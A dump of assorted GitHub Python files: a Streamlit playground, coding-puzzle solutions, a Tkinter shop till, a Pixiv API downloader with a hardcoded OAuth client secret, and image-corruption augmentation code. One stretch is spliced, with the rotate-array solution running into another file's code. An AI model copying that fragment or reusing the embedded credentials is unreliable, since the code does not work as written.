port=8080)\n","repo_name":"matthiasdupont/covid-graph","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2852389225","text":"import streamlit as st\nfrom streamlit import runtime\nfrom streamlit_ace import st_ace\nfrom utils.code_runner import execute\nfrom utils.shorten_urls import get_code_params, set_code_params\n\nst.set_page_config(\n page_title=\"Stlite - Playground\",\n layout=\"wide\",\n initial_sidebar_state=\"expanded\",\n)\nst.title(\"Playground\")\n\nif \"python\" not in st.session_state:\n get_code_params()\n\nwith st.expander(\"Code\", expanded=True):\n content = st_ace(\n value=st.session_state[\"python\"],\n key=\"python\",\n language=\"python\",\n min_lines=20,\n )\n\nawait execute(st.session_state[\"python\"])\nset_code_params()\n","repo_name":"dmenezesgabriel/lite","sub_path":"stlite/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17628750127","text":"from typing import List\n\nclass Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n if len(nums) <= 1:\n return\n \n k = k%len(nums)\n def reverseList(left, right):\n while lefttarget:\n win_product/=arr[left]\n left+=1\n for i in range(left,right,1):\n tmp=arr[i:right+1]\n res.append(tmp)\n return res\n\n\n ","repo_name":"HumphreyHao/Pattern-for-python","sub_path":"28_1.py","file_name":"28_1.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24220129759","text":"from tkinter import*\nimport random\nimport time\nimport datetime\nimport tkinter.messagebox\n\ndef Ref():\n x = random.randint(1234, 434354)\n randomRef = str(x)\n rand.set(randomRef)\n\n CoG = float(galaxy.get())\n CoK = float(kinder.get())\n CoB = float(bounty.get())\n CoT = float(twix.get())\n\n Cost_Galaxy = CoG * 1.99\n Cost_Kinder = CoK * 1.49\n Cost_Bounty = CoB * 1.29\n Cost_Twix = CoT * 0.99\n\n cost_subtotal = \"£\", str('%.2f' % (Cost_Bounty + Cost_Galaxy + Cost_Kinder + Cost_Twix))\n cost_tax = \"£\", str('%.2f' % ((Cost_Bounty + Cost_Galaxy + Cost_Kinder + Cost_Twix) * 0.2))\n cost_total = \"£\", str('%.2f' % ((Cost_Bounty + Cost_Galaxy + Cost_Kinder + Cost_Twix) * 1.2))\n \n subtotal.set(cost_subtotal)\n vat.set(cost_tax)\n total.set(cost_total)\n\ndef Quit():\n root.destroy()\n\ndef Reset():\n rand.set(\"\")\n galaxy.set(\"\")\n kinder.set(\"\")\n bounty.set(\"\")\n twix.set(\"\")\n total.set(\"\")\n subtotal.set(\"\")\n vat.set(\"\")\n\nroot = Tk()\nroot.geometry(\"1600x800+0+0\")\nroot.title(\"Sea Front Sweet & Candy Shop System\")\n\nTops = Frame(root, width = 1600, height = 50, relief=SUNKEN)\nTops.pack(side=TOP)\n\nFrame_1 = Frame(root, width = 800, height = 700, relief=SUNKEN)\nFrame_1.pack(side=LEFT)\n\nFrame_2 = Frame(root, width = 800, height = 700, relief=SUNKEN)\nFrame_2.pack(side=RIGHT)\n\n#---------------------------Time---------------------------\n\nnow = datetime.datetime.now()\nlocaltime = time.asctime(time.localtime(time.time()))\n\n#---------------------------Info---------------------------\n\nlblInfo = Label(Tops, font = ('arial', 50, 'bold'), text = 'Sea Front Sweet & Candy Shop System', fg = 'navy', bd = 10, anchor = 'w')\nlblInfo.grid(row = 0, column = 0)\nlblInfo = Label(Tops, font = ('arial', 20, 'bold'), text = localtime, fg = 'navy', bd = 10, anchor = 'w')\nlblInfo.grid(row = 1, column = 0)\n\n#---------------------------Sweets---------------------------\n\nrand = StringVar()\ngalaxy = StringVar()\nkinder = StringVar()\nbounty = StringVar()\ntwix = StringVar()\ntotal = StringVar()\nsubtotal = StringVar()\nvat = StringVar()\n\nlblReference = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Reference', bd = 10, anchor = 'w')\nlblReference.grid(row = 0, column = 0)\ntxtReference = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = rand, bd = 10, bg = 'light blue', justify = 'right')\ntxtReference.grid(row = 0, column = 1)\n\nlblGalaxy = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Galaxy', bd = 10, anchor = 'w')\nlblGalaxy.grid(row = 1, column = 0)\ntxtGalaxy = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = galaxy, bd = 10, bg = 'light blue', justify = 'right')\ntxtGalaxy.grid(row = 1, column = 1)\n\nlblKinder = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Kinder', bd = 10, anchor = 'w')\nlblKinder.grid(row = 2, column = 0)\ntxtKinder = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = kinder, bd = 10, bg = 'light blue', justify = 'right')\ntxtKinder.grid(row = 2, column = 1)\n\nlblBounty = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Bounty', bd = 10, anchor = 'w')\nlblBounty.grid(row = 4, column = 0)\ntxtBounty = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = bounty, bd = 10, bg = 'light blue', justify = 'right')\ntxtBounty.grid(row = 4, column = 1)\n\nlblTwix = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Twix', bd = 10, anchor = 'w')\nlblTwix.grid(row = 5, column = 0)\ntxtTwix = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = twix, bd = 10, bg = 'light blue', justify = 'right')\ntxtTwix.grid(row = 5, column = 1)\n\n#--------------------Pricing------------------\n\nlblSubtotal = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Subtotal', bd = 10, anchor = 'w')\nlblSubtotal.grid(row = 1, column = 2)\ntxtSubtotal = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = subtotal, bd = 10, bg = '#ffffff', justify = 'right')\ntxtSubtotal.grid(row = 1, column = 3)\n\nlblVat = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'VAT', bd = 10, anchor = 'w')\nlblVat.grid(row = 2, column = 2)\ntxtVat = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = vat, bd = 10, bg = '#ffffff', justify = 'right')\ntxtVat.grid(row = 2, column = 3)\n\nlblTotal = Label(Frame_1, font = ('arial', 16, 'bold'), text = 'Total', bd = 10, anchor = 'w')\nlblTotal.grid(row = 4, column = 2)\ntxtTotal = Entry(Frame_1, font = ('arial', 16, 'bold'), textvariable = total, bd = 10, bg = '#ffffff', justify = 'right')\ntxtTotal.grid(row = 4, column = 3)\n\n#-------------------Buttons------------------\n\n\nbtnTotal = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Total', \nbg = 'light blue', command = Ref).grid(row = 8, column = 1)\n\nbtnReceipt = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Receipt', \nbg = 'light blue').grid(row = 8, column = 2)\n\nbtnReset = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Reset', \nbg = 'light blue', command = Reset).grid(row = 8, column = 3)\n\nbtnQuit = Button(Frame_1, padx = 16, pady = 8, bd = 10, fg = 'black', font = ('arial', 16, 'bold'), text = 'Quit', \nbg = 'light blue', command = Quit).grid(row = 8, column = 4)\n\n#------------------------Receipt--------------------\n\ntxtReceipt_print = Text(Frame_2, bd = 7, bg = 'light blue', width = 50, font = ('arial', 16, 'bold'))\ntxtReceipt_print.place(width=1000, height=420)\n\n\n\n\n\nroot.mainloop()\n","repo_name":"mo-abu/sweet-manager","sub_path":"sweetshop log in system.py","file_name":"sweetshop log in system.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27449961650","text":"import setuptools\nimport os\nimport os.path\n\n\ndef SubDirecs(direc, pre):\n list = []\n for sub in os.listdir(direc):\n if sub == \"__pycache__\":\n continue\n path = os.path.join(direc, sub)\n if not os.path.isdir(path):\n continue\n list.append(pre + sub)\n return list\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\npackages = [\"cornichon\"]\nroot = os.path.dirname(__file__)\npackages.extend(SubDirecs(os.path.join(root, \"cornichon\"), \"cornichon/\"))\n\nsetuptools.setup(\n name=\"cornichon\",\n version=\"0.9.5\",\n author=\"Zeb Mason\",\n author_email=\"consulting@cyclerouter.co.uk\",\n maintainer=\"Zeb Mason\",\n maintainer_email=\"consulting@cyclerouter.co.uk\",\n license=\"LGPL v2\",\n description=\"A small Gherkin DSL parser that generates stub code\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/zebmason/Cornichon\",\n packages=packages,\n classifiers=[\n \"Framework :: Pytest\",\n \"Topic :: Software Development :: Code Generators\",\n \"Topic :: Software Development :: Testing :: BDD\",\n \"Topic :: Text Processing\",\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)\",\n \"Programming Language :: C#\",\n \"Programming Language :: C++\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Visual Basic\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Developers\",\n ],\n python_requires='>=3.0.0',\n)\n","repo_name":"zebmason/Cornichon","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"73888244071","text":"# -*- coding: utf8 -*-\nimport getpass\nimport requests\nimport sys\n\n_session = None\n_headers = {}\n\ndef initialization():\n global _session\n _session = requests.Session()\n\n global _headers\n _headers = {\n 'Referer': 'http://www.pixiv.net/',\n 'User-Agent': 'PixivIOSApp/5.7.2',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\ndef login():\n url = 'https://oauth.secure.pixiv.net/auth/token'\n\n postdata = {\n 'username': input('Pixiv ID: '),\n 'password': getpass.getpass('Password: '),\n 'grant_type': 'password',\n 'client_id': 'bYGKuGVw91e0NMfPGp44euvGt59s',\n 'client_secret': 'HP3RmkgAmEGro0gn1x9ioawQE8WMfvLXDz3ZqxpK',\n }\n r = _request(method = 'POST', url = url, postdata = postdata)\n\n _headers.update({\n 'Authorization': 'Bearer ' + r.json()['response']['access_token'],\n 'Cookie': 'PHPSESSID=' + r.cookies['PHPSESSID']\n })\n\ndef getRank(data):\n url = 'https://public-api.secure.pixiv.net/v1/ranking/all'\n params = {\n 'mode': data['mode'],\n 'page': data['p'],\n 'date' : data['date'],\n 'per_page': 50,\n 'include_stats': False,\n 'include_sanity_level': False,\n 'image_sizes': 'large',\n 'profile_image_sizes': 'px_50x50'\n }\n r = _request(method = 'GET', url = url, params = params)\n\n return r.json()\n\ndef downloadImage(data):\n with open(data['path'], 'wb') as f:\n r = _request(method = 'GET', url = data['url'], stream = True)\n\n currentLength = 0\n totalLength = int(r.headers.get('content-length'))\n\n print('\\033[?25l', end = '')\n for chunk in r.iter_content(chunk_size = int(totalLength / 20)):\n f.write(chunk)\n currentLength += len(chunk)\n _processingBar(int(20 * currentLength / totalLength), data['str'])\n print('\\033[?25h', end = '')\n\n if r.status_code == requests.codes.ok:\n print('\\033[32mdone\\033[0m')\n else:\n print('\\033[31mfail\\033[0m')\n\ndef _processingBar(process, message):\n sys.stdout.write('\\r%s: %3s%% %s%s ' % (message, str(process * 5), '\\033[47m' + ' ' * process + '\\033[0m', ' ' * (20 - process)))\n sys.stdout.flush()\n\ndef _request(method, url, postdata = None, params = None, stream = False):\n if method == 'GET':\n return _session.get(url, headers = _headers, params = params, stream = stream, timeout = 10)\n else:\n return _session.post(url, headers = _headers, params = params, data = postdata, timeout = 10)\n","repo_name":"YukiSora/pixiv-downloader","sub_path":"webIO.py","file_name":"webIO.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19785863905","text":"import os\nfrom PIL import Image\nimport cv2\nimport os.path\nimport time\nimport torch\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport numpy as np\n\nimport skimage as sk\nfrom skimage.filters import gaussian\nfrom io import BytesIO\nfrom wand.image import Image as WandImage\nfrom wand.api import library as wandlibrary\nimport wand.color as WandColor\nimport ctypes\nfrom PIL import Image as PILImage\nimport cv2\nfrom scipy.ndimage import zoom as scizoom\nfrom scipy.ndimage.interpolation import map_coordinates\nimport warnings\n\n## Adapted from https://github.com/hendrycks/robustness\n# For more info read https://arxiv.org/abs/1903.12261\n\nIMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm']\nwarnings.simplefilter(\"ignore\", UserWarning)\n\n# Tell Python about the C method\nwandlibrary.MagickMotionBlurImage.argtypes = (ctypes.c_void_p, # wand\n ctypes.c_double, # radius\n ctypes.c_double, # sigma\n ctypes.c_double) # angle\n\n# Extend wand.image.Image class to include method signature\nclass MotionImage(WandImage):\n def motion_blur(self, radius=0.0, sigma=0.0, angle=0.0):\n wandlibrary.MagickMotionBlurImage(self.wand, radius, sigma, angle)\n\n\nclass FileHelpers:\n def is_image_file(filename):\n \"\"\"Checks if a file is an image.\n Args:\n filename (string): path to a file\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in IMG_EXTENSIONS)\n\n def find_subfolders(dir):\n subfolders = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n subfolders.sort()\n subfolder_to_idx = {subfolders[i]: i for i in range(len(subfolders))}\n return subfolders, subfolder_to_idx\n\n\n def make_dataset(dir, subfolder_to_idx):\n images = []\n dir = os.path.expanduser(dir)\n if subfolder_to_idx:\n for target in sorted(os.listdir(dir)):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n if FileHelpers.is_image_file(fname):\n path = os.path.join(root, fname)\n item = (path, fname, subfolder_to_idx[target])\n images.append(item)\n else:\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in sorted(fnames):\n if FileHelpers.is_image_file(fname):\n path = os.path.join(root, fname)\n item = (path, fname,\"\")\n images.append(item)\n\n\n return images\n\nclass AugmentationHelpers:\n # -------------- Helpers ------------------\n\n def disk(radius, alias_blur=0.1, dtype=np.float32):\n if radius <= 8:\n L = np.arange(-8, 8 + 1)\n ksize = (3, 3)\n else:\n L = np.arange(-radius, radius + 1)\n ksize = (5, 5)\n X, Y = np.meshgrid(L, L)\n aliased_disk = np.array((X ** 2 + Y ** 2) <= radius ** 2, dtype=dtype)\n aliased_disk /= np.sum(aliased_disk)\n\n # supersample disk to antialias\n return cv2.GaussianBlur(aliased_disk, ksize=ksize, sigmaX=alias_blur)\n\n # Extend wand.image.Image class to include method signature\n class MotionImage(WandImage):\n def motion_blur(self, radius=0.0, sigma=0.0, angle=0.0):\n wandlibrary.MagickMotionBlurImage(self.wand, radius, sigma, angle)\n\n # modification of https://github.com/FLHerne/mapgen/blob/master/diamondsquare.py\n def plasma_fractal(mapsize=256, wibbledecay=3):\n \"\"\"\n Generate a heightmap using diamond-square algorithm.\n Return square 2d array, side length 'mapsize', of floats in range 0-255.\n 'mapsize' must be a power of two.\n \"\"\"\n assert (mapsize & (mapsize - 1) == 0)\n maparray = np.empty((mapsize, mapsize), dtype=np.float_)\n maparray[0, 0] = 0\n stepsize = mapsize\n wibble = 100\n\n def wibbledmean(array):\n return array / 4 + wibble * np.random.uniform(-wibble, wibble, array.shape)\n\n def fillsquares():\n \"\"\"For each square of points stepsize apart,\n calculate middle value as mean of points + wibble\"\"\"\n cornerref = maparray[0:mapsize:stepsize, 0:mapsize:stepsize]\n squareaccum = cornerref + np.roll(cornerref, shift=-1, axis=0)\n squareaccum += np.roll(squareaccum, shift=-1, axis=1)\n maparray[stepsize // 2:mapsize:stepsize,\n stepsize // 2:mapsize:stepsize] = wibbledmean(squareaccum)\n\n def filldiamonds():\n \"\"\"For each diamond of points stepsize apart,\n calculate middle value as mean of points + wibble\"\"\"\n mapsize = maparray.shape[0]\n drgrid = maparray[stepsize // 2:mapsize:stepsize, stepsize // 2:mapsize:stepsize]\n ulgrid = maparray[0:mapsize:stepsize, 0:mapsize:stepsize]\n ldrsum = drgrid + np.roll(drgrid, 1, axis=0)\n lulsum = ulgrid + np.roll(ulgrid, -1, axis=1)\n ltsum = ldrsum + lulsum\n maparray[0:mapsize:stepsize, stepsize // 2:mapsize:stepsize] = wibbledmean(ltsum)\n tdrsum = drgrid + np.roll(drgrid, 1, axis=1)\n tulsum = ulgrid + np.roll(ulgrid, -1, axis=0)\n ttsum = tdrsum + tulsum\n maparray[stepsize // 2:mapsize:stepsize, 0:mapsize:stepsize] = wibbledmean(ttsum)\n\n while stepsize >= 2:\n fillsquares()\n filldiamonds()\n stepsize //= 2\n wibble /= wibbledecay\n\n maparray -= maparray.min()\n return maparray / maparray.max()\n\n\n def clipped_zoom(img, zoom_factor):\n h = img.shape[0]\n # ceil crop height(= crop width)\n ch = int(np.ceil(h / zoom_factor))\n\n top = (h - ch) // 2\n img = scizoom(img[top:top + ch, top:top + ch], (zoom_factor, zoom_factor, 1), order=1)\n # trim off any extra pixels\n trim_top = (img.shape[0] - h) // 2\n\n return img[trim_top:trim_top + h, trim_top:trim_top + h]\n\n\nclass Augmentations:\n\n\n # --------------------Distortions ------------------------\n order = {\n 0 : ['random_erase'],\n 1 : ['color_jitter'],\n 2 : [ 'gaussian_noise', 'shot_noise', 'impulse_noise', 'speckle_noise'],\n 3: ['gaussian_blur', 'defocus_blur', 'motion_blur', 'zoom_blur', 'spatter']\n }\n\n def get_list():\n l = []\n for key in list(Augmentations.order):\n l += Augmentations.order[key]\n\n return l\n\n # Custom - Hendrycks 2019\n def gaussian_noise(x, severity=1):\n c = [.08, .12, 0.18, 0.26, 0.38][severity - 1]\n\n x = np.array(x) / 255.\n return np.clip(x + np.random.normal(size=x.shape, scale=c), 0, 1) * 255\n\n\n def shot_noise(x, severity=1):\n c = [60, 25, 12, 5, 3][severity - 1]\n\n x = np.array(x) / 255.\n return np.clip(np.random.poisson(x * c) / c, 0, 1) * 255\n\n\n def impulse_noise(x, severity=1):\n c = [.015, .06, .09, 0.17, 0.27][severity - 1]\n\n x = sk.util.random_noise(np.array(x) / 255., mode='s&p', amount=c)\n return np.clip(x, 0, 1) * 255\n\n\n def speckle_noise(x, severity=1):\n c = [.15, .2, 0.35, 0.45, 0.6][severity - 1]\n\n x = np.array(x) / 255.\n return np.clip(x + x * np.random.normal(size=x.shape, scale=c), 0, 1) * 255\n\n def gaussian_blur(x, severity=1):\n c = [1, 2, 3, 4, 6][severity - 1]\n\n x = gaussian(np.array(x) / 255., sigma=c, multichannel=True)\n return np.clip(x, 0, 1) * 255\n\n\n def glass_blur(x, severity=1):\n # sigma, max_delta, iterations\n c = [(0.7, 1, 2), (0.9, 2, 1), (1, 2, 3), (1.1, 3, 2), (1.5, 4, 2)][severity - 1]\n\n x = np.uint8(gaussian(np.array(x) / 255., sigma=c[0], multichannel=True) * 255)\n\n # locally shuffle pixels\n for i in range(c[2]):\n for h in range(224 - c[1], c[1], -1):\n for w in range(224 - c[1], c[1], -1):\n dx, dy = np.random.randint(-c[1], c[1], size=(2,))\n h_prime, w_prime = h + dy, w + dx\n # swap\n x[h, w], x[h_prime, w_prime] = x[h_prime, w_prime], x[h, w]\n\n return np.clip(gaussian(x / 255., sigma=c[0], multichannel=True), 0, 1) * 255\n\n\n def defocus_blur(x, severity=1):\n c = [(3, 0.1), (4, 0.5), (6, 0.5), (8, 0.5), (10, 0.5)][severity - 1]\n\n x = np.array(x) / 255.\n kernel = AugmentationHelpers.disk(radius=c[0], alias_blur=c[1])\n\n channels = []\n for d in range(3):\n channels.append(cv2.filter2D(x[:, :, d], -1, kernel))\n channels = np.array(channels).transpose((1, 2, 0)) # 3x224x224 -> 224x224x3\n\n return np.clip(channels, 0, 1) * 255\n\n\n def motion_blur(x, severity=1):\n c = [(7, 3), (15, 5), (15, 8), (15, 12), (20, 15)][severity - 1]\n\n output = BytesIO()\n x= Image.fromarray(np.uint8(x))\n x.save(output, format='PNG')\n x = MotionImage(blob=output.getvalue())\n\n x.motion_blur(radius=c[0], sigma=c[1], angle=np.random.uniform(-45, 45))\n\n x = cv2.imdecode(np.fromstring(x.make_blob(), np.uint8),\n cv2.IMREAD_UNCHANGED)\n\n if x.shape != (224, 224):\n return np.clip(x[..., [2, 1, 0]], 0, 255) # BGR to RGB\n else: # greyscale to RGB\n return np.clip(np.array([x, x, x]).transpose((1, 2, 0)), 0, 255)\n\n\n def zoom_blur(x, severity=1):\n c = [np.arange(1, 1.11, 0.01),\n np.arange(1, 1.16, 0.01),\n np.arange(1, 1.21, 0.02),\n np.arange(1, 1.26, 0.02),\n np.arange(1, 1.31, 0.03)][severity - 1]\n\n x = (np.array(x) / 255.).astype(np.float32)\n out = np.zeros_like(x)\n for zoom_factor in c:\n out += AugmentationHelpers.clipped_zoom(x, zoom_factor)\n\n x = (x + out) / (len(c) + 1)\n return np.clip(x, 0, 1) * 255\n\n def fog(x, severity=1):\n c = [(1.5, 2), (2, 2), (2.5, 1.7), (2.5, 1.5), (3, 1.4)][severity - 1]\n size = x.shape[0]\n x = np.array(x) / 255.\n max_val = x.max()\n x += c[0] * AugmentationHelpers.plasma_fractal(mapsize=size, wibbledecay=c[1])[:size, :size][..., np.newaxis]\n return np.clip(x * max_val / (max_val + c[0]), 0, 1) * 255\n\n def spatter(x, severity=1):\n c = [(0.65, 0.3, 4, 0.69, 0.6, 0),\n (0.65, 0.3, 3, 0.68, 0.6, 0),\n (0.65, 0.3, 2, 0.68, 0.5, 0),\n (0.65, 0.3, 1, 0.65, 1.5, 1),\n (0.67, 0.4, 1, 0.65, 1.5, 1)][severity - 1]\n x = np.array(x, dtype=np.float32) / 255.\n\n liquid_layer = np.random.normal(size=x.shape[:2], loc=c[0], scale=c[1])\n\n liquid_layer = gaussian(liquid_layer, sigma=c[2])\n liquid_layer[liquid_layer < c[3]] = 0\n if c[5] == 0:\n liquid_layer = (liquid_layer * 255).astype(np.uint8)\n dist = 255 - cv2.Canny(liquid_layer, 50, 150)\n dist = cv2.distanceTransform(dist, cv2.DIST_L2, 5)\n _, dist = cv2.threshold(dist, 20, 20, cv2.THRESH_TRUNC)\n dist = cv2.blur(dist, (3, 3)).astype(np.uint8)\n dist = cv2.equalizeHist(dist)\n # ker = np.array([[-1,-2,-3],[-2,0,0],[-3,0,1]], dtype=np.float32)\n # ker -= np.mean(ker)\n ker = np.array([[-2, -1, 0], [-1, 1, 1], [0, 1, 2]])\n dist = cv2.filter2D(dist, cv2.CV_8U, ker)\n dist = cv2.blur(dist, (3, 3)).astype(np.float32)\n\n m = cv2.cvtColor(liquid_layer * dist, cv2.COLOR_GRAY2BGRA)\n m /= np.max(m, axis=(0, 1))\n m *= c[4]\n\n # water is pale turqouise\n color = np.concatenate((175 / 255. * np.ones_like(m[..., :1]),\n 238 / 255. * np.ones_like(m[..., :1]),\n 238 / 255. * np.ones_like(m[..., :1])), axis=2)\n\n color = cv2.cvtColor(color, cv2.COLOR_BGR2BGRA)\n x = cv2.cvtColor(x, cv2.COLOR_BGR2BGRA)\n\n return cv2.cvtColor(np.clip(x + m * color, 0, 1), cv2.COLOR_BGRA2BGR) * 255\n else:\n m = np.where(liquid_layer > c[3], 1, 0)\n m = gaussian(m.astype(np.float32), sigma=c[4])\n m[m < 0.8] = 0\n # m = np.abs(m) ** (1/c[4])\n\n # mud brown\n color = np.concatenate((63 / 255. * np.ones_like(x[..., :1]),\n 42 / 255. * np.ones_like(x[..., :1]),\n 20 / 255. * np.ones_like(x[..., :1])), axis=2)\n\n color *= m[..., np.newaxis]\n x *= (1 - m[..., np.newaxis])\n\n return np.clip(x + color, 0, 1) * 255\n\n\n def contrast(x, severity=1):\n c = [0.4, .3, .2, .1, .05][severity - 1]\n\n x = np.array(x) / 255.\n means = np.mean(x, axis=(0, 1), keepdims=True)\n return np.clip((x - means) * c + means, 0, 1) * 255\n\n def saturate(x, severity=1):\n c = [(0.3, 0), (0.1, 0), (2, 0), (5, 0.1), (20, 0.2)][severity - 1]\n\n x = np.array(x) / 255.\n x = sk.color.rgb2hsv(x)\n x[:, :, 1] = np.clip(x[:, :, 1] * c[0] + c[1], 0, 1)\n x = sk.color.hsv2rgb(x)\n\n return np.clip(x, 0, 1) * 255\n\n # Pytorch torchvision transforms\n\n def brightness(x, severity=1):\n img = transforms.functional.adjust_brightness(Image.fromarray(x), severity*0.5)\n return np.array(img)\n\n #TODO: Make three discrete layers\n def color_jitter(x, severity=1):\n b0 = 0.5\n c0 = 0.5\n cl0 = 0.5\n transform = transforms.ColorJitter(brightness=b0*severity, contrast = c0*severity, saturation= cl0*severity)\n img = transform(Image.fromarray(x))\n return np.array(img)\n\n #TODO: Add options to the config \n def random_erase(x, severity=1):\n transf2tensor = transforms.ToTensor()\n transf2PIL = transforms.ToPILImage()\n transform = transforms.RandomErasing(p=0.8,scale=(0.02,0.02))\n img = transform(transf2tensor(Image.fromarray(x)))\n\n return np.array(transf2PIL(img))\n\n\n methods = {\n 'random_erase': random_erase,\n 'color_jitter': color_jitter,\n 'gaussian_noise': gaussian_noise,\n 'shot_noise': shot_noise,\n 'impulse_noise': impulse_noise,\n 'speckle_noise': speckle_noise,\n 'gaussian_blur': gaussian_blur,\n 'glass_blur': glass_blur,\n 'defocus_blur': defocus_blur,\n 'motion_blur':motion_blur,\n 'zoom_blur':zoom_blur,\n 'fog':fog,\n 'spatter': spatter\n }\n","repo_name":"kuldeepbrd1/image-corruptions","sub_path":"augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":14944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5702613607","text":"import sys\nimport math\ninput = sys.stdin.readline\n\nN = int(input().strip())\nA = list(map(int, input().split()))\n\n# 소수 여부를 따져야함. 0, 1 주의\ndef test_prime(num):\n if num == 0 or num == 1:\n return False\n for i in range(2, int(math.sqrt(num)) + 1):\n if num % i == 0:\n return False\n return True\n\nresult = 1\nprime_list = []\n# 소수의 최소공배수는 그냥 곱임.\n# 단, 같은 값 여부를 확인해야함.\nfor i in range(N):\n if test_prime(A[i]) and result != A[i]:\n result *= A[i]\n\nif result == 1:\n print(-1)\nelse:\n print(result)","repo_name":"Kyuber1007/problemsolving","sub_path":"baekjoon/bj21919_소수최소공배수.py","file_name":"bj21919_소수최소공배수.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15159397289","text":"N = int(input())\r\nscores = []\r\nfor idx in range(0, N):\r\n\tscores.append(list(map(int, input().split())))\r\n\r\nsums = []\r\nfor score in scores:\r\n\tsum = score[0] + score[1] + score[2] + score[3] + score[4]*11/90.0\r\n\tsums.append(sum)\r\n\r\nprint(max(sums))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc034/A/4867135.py","file_name":"4867135.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"71669406953","text":"from __future__ import print_function\nimport PIL\nfrom PIL import ImageDraw\nimport os.path\n\n\ndef editPicture():\n '''Runs a menu for you to choose which functions you want to run\n takes no parameters. The program will ask you for needed parameters\n when you choose an option.'''\n #initializes menuOption to 0: a value that shouldn't ever be used except for\n #here\n\n menuOption = 0\n \n\n directoryChoice = raw_input(\"Please enter the name of the folder you want to change: \")\n directory = os.path.join(os.getcwd(), directoryChoice)\n \n while menuOption is not 4:\n \n #Gives the user a chance to input and tells them what each input will do.\n \n print('\\nEnter 1 for Adding a Frame\\n\\n'\n + 'Enter 2 for Adding Family Watermark\\n\\n'\n + 'Enter 3 for Adding both a Border and the Watermark\\n\\nEnter 4 to quit.')\n print(os.getcwd())\n \n try:\n menuOption = int(raw_input(\"Choice: \"))\n except ValueError:\n print(menuOption)\n print('You must enter a number. Try again.')\n \n print(menuOption)\n\n #Now that the user has chosen which input, test if it is in range.\n if menuOption < 1 or menuOption > 4:\n print('You must enter a number between 1 and 4. Try again.')\n \n elif menuOption == 1:\n print('something1')\n #Insert border function here\n frame_images(directory)\n \n elif menuOption == 2:\n print('something2')\n #Insert watermark function here\n watermark(False, directory)\n \n elif menuOption == 3:\n print('something3')\n #Insert code to run both programs\n frame_images(directory)\n watermark(True, directory)\n \n #If the user didn't enter a number, which will cause the program to be annoyed...\n\ndef frame_images(directory=None):\n ''' Saves a modified version of each image in directory.\n\n Uses current directory if no directory is specified. \n Puts images in subdirectory 'modified', creating it if needed.\n New image files are of type PNG and have transparent rounded corners.\n '''\n\n if directory == None:\n directory = os.getcwd() # Use working directory if unspecified\n\n # Create a new directory 'modified'\n new_directory = os.path.join(os.getcwd(), 'modified')\n try:\n os.mkdir(new_directory)\n except OSError:\n pass # if the directory already exists, proceed \n\n # Load all the images\n image_list, file_list = get_images(directory) \n\n # Go through the images and save modified versions\n for n in range(len(image_list)):\n # Parse the filename\n filename, filetype = os.path.splitext(file_list[n])\n \n # Round the corners with radius = 30% of short side\n new_image = round_corners(image_list[n],.30)\n # Save the altered image, using PNG to retain transparency\n new_image_filename = os.path.join(new_directory,filename + '.png')\n new_image.save(new_image_filename)\n 